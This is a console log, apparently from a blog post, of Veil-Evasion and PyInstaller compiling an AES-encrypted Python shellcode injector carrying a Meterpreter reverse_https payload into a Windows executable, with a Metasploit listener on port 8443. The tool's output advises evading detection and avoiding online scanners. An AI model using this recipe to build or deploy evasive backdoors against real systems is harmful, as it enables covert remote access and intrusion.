1019 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest

1022 INFO: Searching for file msvcr90.dll

1022 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll

1022 INFO: Searching for file msvcp90.dll

1023 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll

1023 INFO: Searching for file msvcm90.dll

1023 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll

1097 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py

2045 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py

2163 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py

2289 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py

2322 INFO: Analyzing /usr/share/veil-output/source/output1.py

2440 INFO: Hidden import 'encodings' has been found otherwise

2441 INFO: Looking for run-time hooks

2441 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py

2744 INFO: Warnings written to Z:\usr\share\Veil-Evasion\build\pyi.win32\output1\warnoutput1.txt

2749 INFO: checking PYZ

2749 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing

2750 INFO: building PYZ out00-PYZ.toc

3332 INFO: checking PKG

3334 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing

3334 INFO: building PKG out00-PKG.pkg

4171 INFO: checking EXE

4171 INFO: rebuilding out00-EXE.toc because output1.exe missing

4171 INFO: building EXE from out00-EXE.toc

4174 INFO: Appending archive to EXE Z:\usr\share\Veil-Evasion\dist\output1.exe

=========================================================================

Veil-Evasion | [Version]: 2.17.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

[*] Executable written to: /usr/share/veil-output/compiled/output1.exe

Language: python

Payload: python/shellcode_inject/aes_encrypt

Shellcode: windows/meterpreter/reverse_https

Required Options: compile_to_exe=Y expire_payload=X

inject_method=Virtual use_pyherion=N

Payload File: /usr/share/veil-output/source/output1.py

Handler File: /usr/share/veil-output/handlers/output1_handler.rc

[*] Your payload files have been generated, don't get caught!

[!] And don't submit samples to any online scanner! ;)

MSF Listener 8443 use Payload windows\meterpreter\reverse_https

源链接

Hacking more

...